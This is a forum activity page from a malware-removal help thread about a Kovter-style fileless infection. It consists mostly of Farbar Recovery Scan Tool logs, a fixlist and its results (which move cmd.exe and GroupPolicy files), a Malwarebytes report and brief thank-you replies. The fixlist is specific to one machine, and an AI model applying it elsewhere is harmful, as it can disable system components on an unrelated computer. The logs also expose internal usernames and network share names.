Files (x86)\The Weather Channel\The Weather Channel App\TheWeatherChannelCustomUninstall.exe" Task: {76F492E8-4B04-431F-98ED-1B67F05F6858} - System32\Tasks\HPCustParticipation HP Deskjet 2540 series => C:\Program Files\HP\HP Deskjet 2540 series\Bin\HPCustPartic.exe [2013-02-08] (Hewlett-Packard Co.) Task: {A177D0B5-D3BF-403E-8DA1-24A0048C0F82} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.) Task: {ABE9B009-3F74-4365-BCFA-1E18A1FD5C02} - System32\Tasks\Microsoft_Hardware_Launch_IType_exe => c:\Program Files\Microsoft IntelliType Pro\IType.exe [2011-08-10] (Microsoft Corporation) Task: {BC872F32-F800-4657-A412-6BFD3D112486} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-11-09] (Google Inc.) Task: {C91051DC-C003-41F3-A158-EFD4AC8C6F0D} - System32\Tasks\HP Photo Creations Communicator => C:\ProgramData\HP Photo Creations\Communicator.exe [2014-09-15] () Task: {CD181832-44D0-4403-A423-C9A093D3E763} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-11-08] (Adobe Systems Incorporated) Task: {CF5A98A5-FD07-4166-90D3-F61641768CC1} - System32\Tasks\{6D13831B-383D-46E9-9BCC-BB932C054E2C} => C:\Program Files (x86)\The Print Shop 2.0 Professional\PsLaunch.exe [2010-08-02] () (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\HP Photo Creations Communicator.job => C:\ProgramData\HP Photo Creations\Communicator.exe ==================== Shortcuts ============================= (The entries could be listed to be restored or removed.) Shortcut: C:\Users\Reception\AppData\Local\7b8b\d848.lnk -> C:\Users\Reception\AppData\Local\7b8b\0db0.bat () ShortcutWithArgument: C:\Users\Reception\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\4242a155fcc27c2b\FlashPeak Slimjet.lnk -> C:\Program Files (x86)\Slimjet\slimjet.exe (FlashPeak Inc.) -> --profile-directory=Default ==================== Loaded Modules (Whitelisted) ============== 2016-07-05 14:23 - 2016-07-05 14:23 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll 2016-07-05 14:23 - 2016-07-05 14:23 - 01354040 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll 2016-11-14 07:53 - 2016-11-14 07:53 - 00356008 _____ () C:\Program Files (x86)\Backblaze\bzserv.exe 2006-11-02 19:40 - 2006-11-02 19:40 - 00174656 _____ () C:\Windows\SysWOW64\PSIService.exe 2009-07-13 16:03 - 2009-07-13 20:15 - 00364544 _____ () C:\Windows\SysWOW64\msjetoledb40.dll ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.) ==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist Remote Support Customer => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SepMasterService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SmcService => ""="Service" ==================== Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to default or removed.) ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) ==================== Hosts content: =============================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2009-07-13 21:34 - 2016-10-12 10:10 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 localhost ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\S-1-5-21-3320201264-2921037059-4171379232-1142\Control Panel\Desktop\\Wallpaper -> C:\Users\clayton\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\Control Panel\Desktop\\Wallpaper -> C:\Users\Reception\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 192.168.0.105 - 192.168.0.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk => C:\Windows\pss\HP Digital Imaging Monitor.lnk.CommonStartup MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Start Pervasive PSQL Workgroup Engine.lnk => C:\Windows\pss\Start Pervasive PSQL Workgroup Engine.lnk.CommonStartup MSCONFIG\startupreg: Acrobat Assistant 8.0 => "C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe" MSCONFIG\startupreg: Adobe Acrobat Speed Launcher => "C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe" MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" MSCONFIG\startupreg: FromDocToPDF EPM Support => "C:\PROGRA~2\FROMDO~2\bar\1.bin\65medint.exe" T8EPMSUP.DLL,S MSCONFIG\startupreg: HotKeysCmds => C:\Windows\system32\hkcmd.exe MSCONFIG\startupreg: HP Software Update => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe MSCONFIG\startupreg: IgfxTray => C:\Windows\system32\igfxtray.exe MSCONFIG\startupreg: itype => "c:\Program Files\Microsoft IntelliType Pro\itype.exe" MSCONFIG\startupreg: Logitech Download Assistant => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch MSCONFIG\startupreg: Persistence => C:\Windows\system32\igfxpers.exe MSCONFIG\startupreg: Print Monitor => "C:\Program Files (x86)\Print Tracker\PMonitor.exe" /AsUser MSCONFIG\startupreg: QuickFinder Scheduler => "C:\Program Files (x86)\WordPerfect Office X3\Programs\QFSCHD130.EXE" MSCONFIG\startupreg: RtHDVCpl => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe MSCONFIG\startupreg: Skytel => C:\Program Files\Realtek\Audio\HDA\Skytel.exe ==================== FirewallRules (Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [SPPSVC-In-TCP] => %SystemRoot%\system32\sppsvc.exe FirewallRules: [SPPSVC-In-TCP-NoScope] => %SystemRoot%\system32\sppsvc.exe FirewallRules: [TCP Query User{82CC6A84-0F65-47EA-8BE3-F207CA244A2C}C:\program files (x86)\internet explorer\iexplore.exe] => C:\program files (x86)\internet explorer\iexplore.exe FirewallRules: [UDP Query User{F8BCDB72-BF90-4CE2-9BF9-1F4B8BB7D292}C:\program files (x86)\internet explorer\iexplore.exe] => C:\program files (x86)\internet explorer\iexplore.exe FirewallRules: [{56BBE8D5-557C-483C-A36E-4694A337C99F}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe FirewallRules: [{A4AC4264-384E-41D6-AE48-36C847FD9539}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe FirewallRules: [{3127FC7D-4D1B-455D-B7FD-41CABFC6B21C}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe FirewallRules: [{FCEEA91D-AE9E-479A-BE17-030E83DE8281}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe FirewallRules: [{4063CEB6-2A45-4A28-AFF2-292C9B3E6DCF}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe FirewallRules: [{2570D9B0-C167-4D49-A8CA-DB43E258CA88}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxm08.exe FirewallRules: [{BF1156BA-9B51-48C7-B6E0-A68BCFD0641A}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hposfx08.exe FirewallRules: [{AB1BA386-08EA-4CB3-9290-169EF3FC7956}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe FirewallRules: [{FC73E6D9-AF81-4BA0-A837-67869A303783}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpzwiz01.exe FirewallRules: [{86410668-EC09-4E8F-AA57-37BE1A7B9E56}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpoews01.exe FirewallRules: [{CF6F3B7A-5FFE-4857-A35C-5056D09FEB34}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxs08.exe FirewallRules: [{4C8EF354-5132-43C1-98AA-D5A2B10A5B9F}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqfxt08.exe FirewallRules: [{2C19E4F3-E543-4376-ABB5-70AA0A2A3178}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exe FirewallRules: [{BA01ACB9-72F5-4449-BE99-062BA48EC933}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe FirewallRules: [{E96100CC-BA53-41AA-8CAE-4E9E87F8E1B0}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgm.exe FirewallRules: [{8BE0A430-C8F8-4B3F-BBAF-4B30FA8F4FC7}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgh.exe FirewallRules: [{50745699-4E20-4E3C-832B-1E6A05ED30E7}] => C:\Program Files (x86)\HP\hp software update\hpwucli.exe FirewallRules: [{A1CEF5E6-3D62-42F7-B10F-3EE826F69F35}] => C:\Program Files (x86)\HP\digital imaging\smart web printing\smartwebprintexe.exe FirewallRules: [{CFE82968-778D-404A-8383-E4B132C83C1C}] => C:\Program Files (x86)\Pervasive Software\PSQL\bin\w3dbsmgr.exe FirewallRules: [{FE5A9F0F-64E5-43A5-B74D-4267BA445714}] => C:\Program Files (x86)\Pervasive Software\PSQL\bin\w3dbsmgr.exe FirewallRules: [{792D535E-6928-4608-AB87-7EAC62FCFAD9}] => C:\Program Files\HP\HP Deskjet 2540 series\Bin\DeviceSetup.exe FirewallRules: [{DF705928-FDE8-4C27-93B5-159AA18EE903}] => LPort=5357 FirewallRules: [{8036A550-984E-4D16-A1BA-56A200E03D1A}] => C:\Program Files\HP\HP Deskjet 2540 series\Bin\HPNetworkCommunicatorCom.exe FirewallRules: [TCP Query User{EC49BD0F-52D9-4B49-9730-1B4F69FE6296}C:\program files (x86)\pervasive software\psql\bin\w3dbsmgr.exe] => C:\program files (x86)\pervasive software\psql\bin\w3dbsmgr.exe FirewallRules: [UDP Query User{91FAA043-EAF2-48B8-A853-F19E71692E51}C:\program files (x86)\pervasive software\psql\bin\w3dbsmgr.exe] => C:\program files (x86)\pervasive software\psql\bin\w3dbsmgr.exe FirewallRules: [{5010814D-4D26-4D7F-8B80-2D90CF068D4D}] => C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe FirewallRules: [{E54FEB7B-9565-41DA-85DC-E1FD68D6247E}] => C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe FirewallRules: [{B9D0A4E9-E6F9-4146-8B03-67C75D8B4F51}] => C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\snac64.exe FirewallRules: [{7F3D2F9D-D014-4F5A-8CBA-3FBD39FD23D8}] => C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\snac64.exe FirewallRules: [{44ECC4F7-DA04-49D9-854A-01A39B01C141}] => C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{DA3C61ED-20F4-4287-B397-8CA879900055}] => C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{077B6AE8-63F5-4122-A822-4D12160FAA23}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{FC758905-E8A3-431E-A498-DD8694753456}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{22F46C83-35C6-4AA0-B038-180F477DCBFE}] => C:\Program Files\HP\HP Officejet Pro 8610\bin\FaxApplications.exe FirewallRules: [{11096C12-C565-4CE1-B681-C4F76663EF49}] => C:\Program Files\HP\HP Officejet Pro 8610\bin\DigitalWizards.exe FirewallRules: [{5204B832-817F-4173-9CE2-0D69EBBDC6AE}] => C:\Program Files\HP\HP Officejet Pro 8610\bin\SendAFax.exe FirewallRules: [{44E5427D-1340-4119-B492-CBED58B9C1F1}] => C:\Program Files\HP\HP Officejet Pro 8610\Bin\DeviceSetup.exe FirewallRules: [{129E950C-8BB0-420D-85EA-7208EF2C3D43}] => C:\Program Files\HP\HP Officejet Pro 8610\Bin\HPNetworkCommunicatorCom.exe FirewallRules: [{D5D458D6-78D8-41E9-B965-9ACCD3323D44}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{396FFEC3-E353-4DCE-9F52-20C78D68CE90}] => C:\Program Files\iTunes\iTunes.exe FirewallRules: [TCP Query User{52AF0EF5-B842-4C97-BB7E-5B8DC02D3EA3}C:\program files (x86)\roadkil.net\commtest_1_2_winall.exe] => C:\program files (x86)\roadkil.net\commtest_1_2_winall.exe FirewallRules: [UDP Query User{6D52537C-A62A-4A8D-AAF5-02DCDC7B910C}C:\program files (x86)\roadkil.net\commtest_1_2_winall.exe] => C:\program files (x86)\roadkil.net\commtest_1_2_winall.exe FirewallRules: [{A4391F3D-FD04-44C9-9AD0-384F184595D4}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe ==================== Restore Points ========================= 08-11-2016 15:49:23 Installed LogMeIn 08-11-2016 16:07:12 Installed LogMeIn 09-11-2016 16:53:11 Windows Update 02-12-2016 04:48:22 Scheduled Checkpoint 05-12-2016 12:04:32 Restore Operation ==================== Faulty Device Manager Devices ============= Name: Photosmart Plus B210 series Description: Photosmart Plus B210 series Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318} Manufacturer: HP Service: Problem: : This device is disabled. (Code 22) Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: Photosmart 7510 series Description: Photosmart 7510 series Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318} Manufacturer: HP Service: Problem: : This device is disabled. (Code 22) Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP Officejet Pro 8610 Description: HP Officejet Pro 8610 Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318} Manufacturer: HP Service: Problem: : This device is disabled. (Code 22) Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP Officejet Pro 8610 Description: HP Officejet Pro 8610 Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318} Manufacturer: HP Service: Problem: : This device is disabled. (Code 22) Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. ==================== Event log errors: ========================= Application errors: ================== Error: (12/06/2016 04:46:41 PM) (Source: Symantec AntiVirus) (EventID: 51) (User: IDS) Description: Security Risk Found!SONAR.Kotver!gen4 in File: c:\windows\syswow64\rundll32.exe by: SONAR scan. Action: . Action Description: Access Denied Error: (12/06/2016 04:43:38 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: EXCEL.EXE, version: 14.0.7176.5000, time stamp: 0x57fdf479 Faulting module name: EXCEL.EXE, version: 14.0.7176.5000, time stamp: 0x57fdf479 Exception code: 0xc0000005 Fault offset: 0x0019226f Faulting process id: 0xa3c Faulting application start time: 0x01d25008cc7a700a Faulting application path: C:\PROGRA~2\MICROS~1\Office14\EXCEL.EXE Faulting module path: C:\PROGRA~2\MICROS~1\Office14\EXCEL.EXE Report Id: 0b9bdde8-bbfd-11e6-8bb4-00270e34bb77 Error: (12/06/2016 04:35:06 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (12/06/2016 04:30:59 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program Explorer.exe version 6.1.7601.23537 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel. Process ID: 19f0 Start Time: 01d24fb2095acdfb Termination Time: 60000 Application Path: C:\Windows\Explorer.exe Report Id: 19b15be4-bbfb-11e6-8bb5-00270e34bb77 Error: (12/06/2016 04:26:59 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program EXCEL.EXE version 14.0.7176.5000 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel. Process ID: 27d4 Start Time: 01d25004559b8057 Termination Time: 34332 Application Path: C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE Report Id: 9868f99d-bbfa-11e6-8bb5-00270e34bb77 Error: (12/06/2016 11:44:38 AM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program Acrobat.exe version 10.1.5.33 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel. Process ID: 19e8 Start Time: 01d24fdfce7ba9bc Termination Time: 60000 Application Path: C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat.exe Report Id: 14e9b3ad-bbd3-11e6-8bb5-00270e34bb77 Error: (12/06/2016 11:37:12 AM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program Acrobat.exe version 10.1.5.33 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel. Process ID: 2334 Start Time: 01d24fdebc3fce12 Termination Time: 76 Application Path: C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat.exe Report Id: 2abd62c7-bbd2-11e6-8bb5-00270e34bb77 Error: (12/06/2016 08:01:22 AM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program OUTLOOK.EXE version 14.0.7172.5000 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel. Process ID: 19d0 Start Time: 01d24fbfb71c285a Termination Time: 9518 Application Path: C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE Report Id: 05e67684-bbb4-11e6-8bb5-00270e34bb77 Error: (12/06/2016 07:50:30 AM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: ) Description: A problem prevented Customer Experience Improvement Program data from being sent to Microsoft, (Error 80004005). Error: (12/06/2016 05:52:41 AM) (Source: Symantec AntiVirus) (EventID: 51) (User: IDS) Description: Security Risk Found!SONAR.Kotver!gen4 in File: c:\windows\syswow64\rundll32.exe by: SONAR scan. Action: . Action Description: Access Denied System errors: ============= Error: (12/07/2016 03:31:55 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY) Description: The following fatal alert was received: 20. Error: (12/07/2016 03:07:47 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY) Description: The following fatal alert was generated: 10. The internal error state is 10. Error: (12/07/2016 03:07:23 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY) Description: The following fatal alert was received: 20. Error: (12/07/2016 02:01:49 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY) Description: The following fatal alert was generated: 10. The internal error state is 10. Error: (12/07/2016 01:31:17 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY) Description: The following fatal alert was received: 20. Error: (12/07/2016 01:10:50 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY) Description: The following fatal alert was received: 20. Error: (12/06/2016 10:25:12 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY) Description: The following fatal alert was generated: 10. The internal error state is 10. Error: (12/06/2016 10:04:30 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY) Description: The following fatal alert was received: 20. Error: (12/06/2016 09:46:32 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY) Description: The following fatal alert was received: 20. Error: (12/06/2016 09:01:34 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY) Description: The following fatal alert was received: 20. CodeIntegrity: =================================== Date: 2016-10-12 11:10:15.723 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-10-12 11:10:15.676 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2014-12-30 14:37:50.421 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2014-12-30 14:21:58.702 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2014-12-30 14:00:27.988 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2014-12-29 16:13:00.235 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2014-12-29 15:58:22.386 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2014-12-29 15:21:37.531 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2014-12-29 14:59:21.278 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2014-12-29 14:46:25.562 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. ==================== Memory info =========================== Processor: Intel(R) Core(TM)2 Duo CPU E8400 @ 3.00GHz Percentage of memory in use: 60% Total physical RAM: 4052.52 MB Available physical RAM: 1620.38 MB Total Virtual: 8103.22 MB Available Virtual: 5488.07 MB ==================== Drives ================================ Drive c: () (Fixed) (Total:465.66 GB) (Free:331.21 GB) NTFS ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: EB6F6C15) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS) ==================== End of Addition.txt ============================
- December 7, 2016
- 4 replies
Help with Rootkit.Fileless.MTGen please

CGTIII replied to CGTIII's topic in Resolved Malware Removal Logs

Much appreciated. God Bless You for all your assistance. You've been *very* responsive. In the future is there a way to request assistance specifically from you? We also seem to have similar work hours. ;-)
- December 2, 2016
- 20 replies
Help with Rootkit.Fileless.MTGen please

CGTIII replied to CGTIII's topic in Resolved Malware Removal Logs

All looks good. :-) Making donation now. Thank you sir!
- December 2, 2016
- 20 replies
Help with Rootkit.Fileless.MTGen please

CGTIII replied to CGTIII's topic in Resolved Malware Removal Logs

Unknown file now gone. VG! How's the rest look? Also reran MBAM as crosscheck. Please find its report below also. Anything else to check? Continued thanks. - CT Fix result of Farbar Recovery Scan Tool (x64) Version: 30-11-2016 Ran by cjerald (01-12-2016 06:03:05) Run:4 Running from \\SPARTA\RedirectedFolders\cjerald\Desktop Loaded Profiles: cjerald (Available Profiles: Clayton & cjerald) Boot Mode: Normal ============================================== fixlist content: ***************** Start CreateRestorePoint: Startup: \\SPARTA\RedirectedFolders\cjerald\Start Menu\Programs\Startup\756f18.lnk [2016-11-23] ShortcutTarget: 756f18.lnk -> (No File) Startup: \\SPARTA\RedirectedFolders\cjerald\Start Menu\Programs\Startup\96da9b.lnk [2016-11-18] ShortcutTarget: 96da9b.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) GroupPolicyScripts: Restriction <======= ATTENTION Shortcut: C:\Users\cjerald\AppData\Local\322148\4c5510.lnk -> C:\Users\cjerald\AppData\Local\322148\83934e.bat (No File) C:\Users\cjerald\AppData\Local\322148 Folder: C:\Users\cjerald\AppData\Local\322148 CMD: ipconfig /flushdns EmptyTemp: end ***************** Restore point was successfully created. Startup: \\SPARTA\RedirectedFolders\cjerald\Start Menu\Programs\Startup\756f18.lnk [2016-11-23] => not found. ShortcutTarget: 756f18.lnk -> (No File) => not found. Startup: \\SPARTA\RedirectedFolders\cjerald\Start Menu\Programs\Startup\96da9b.lnk [2016-11-18] => not found. Could not move "C:\Windows\System32\cmd.exe" => Scheduled to move on reboot. C:\Windows\system32\GroupPolicy\Machine => moved successfully C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully C:\Users\cjerald\AppData\Local\322148\4c5510.lnk => moved successfully C:\Users\cjerald\AppData\Local\322148 => moved successfully ========================= Folder: C:\Users\cjerald\AppData\Local\322148 ======================== not found. ====== End of Folder: ====== ========= ipconfig /flushdns ========= Windows IP Configuration Successfully flushed the DNS Resolver Cache. ========= End of CMD: ========= =========== EmptyTemp: ========== BITS transfer queue => 0 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 18985497 B Java, Flash, Steam htmlcache => 3285 B Windows/system/drivers => 6295 B Edge => 0 B Chrome => 108856135 B Firefox => 0 B Opera => 0 B Temp, IE cache, history, cookies, recent: Default => 0 B Public => 0 B ProgramData => 0 B systemprofile => 0 B systemprofile32 => 128 B LocalService => 0 B NetworkService => 0 B clayton => 0 B cjerald => 450135245 B Connie => 0 B UpdatusUser => 0 B RecycleBin => 0 B EmptyTemp: => 551.2 MB temporary data Removed. ================================ Malwarebytes Anti-Malware www.malwarebytes.org Scan Date: 12/1/2016 Scan Time: 7:29 AM Logfile: Administrator: Yes Version: 2.2.1.1043 Malware Database: v2016.12.01.09 Rootkit Database: v2016.11.20.01 License: Free Malware Protection: Disabled Malicious Website Protection: Disabled Self-protection: Disabled OS: Windows 7 Service Pack 1 CPU: x64 File System: NTFS User: cjerald Scan Type: Threat Scan Result: Completed Objects Scanned: 394666 Time Elapsed: 13 min, 13 sec Memory: Enabled Startup: Enabled Filesystem: Enabled Archives: Enabled Rootkits: Enabled Heuristics: Enabled PUP: Enabled PUM: Enabled Processes: 0 (No malicious items detected) Modules: 0 (No malicious items detected) Registry Keys: 0 (No malicious items detected) Registry Values: 0 (No malicious items detected) Registry Data: 0 (No malicious items detected) Folders: 0 (No malicious items detected) Files: 0 (No malicious items detected) Physical Sectors: 0 (No malicious items detected) (end)
- December 1, 2016
- 20 replies
Help with Rootkit.Fileless.MTGen please

CGTIII replied to CGTIII's topic in Resolved Malware Removal Logs

Window on boot that says: "Windows can't open this file: File: 3e258b.08d7732 ..." Continued thanks... Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 30-11-2016 Ran by cjerald (administrator) on PC-8 (01-12-2016 04:41:49) Running from \\SPARTA\RedirectedFolders\cjerald\Desktop Loaded Profiles: cjerald (Available Profiles: Clayton & cjerald) Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States) Internet Explorer Version 11 (Default browser: "C:\Program Files (x86)\Slimjet\slimjet.exe" -- "%1") Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe () C:\Program Files (x86)\Backblaze\bzserv.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe (Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe (Intel(R) Corporation) C:\Program Files\Intel\BCA\pabeSvc64.exe (LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe (LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\ramaint.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe (Pervasive Software Inc.) C:\Program Files (x86)\Pervasive Software\PSQL\bin\w3dbsmgr.exe (Symantec Corporation) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe (McAfee, Inc.) C:\Program Files\TrueKey\McAfee.TrueKey.Service.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe (LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe (Symantec 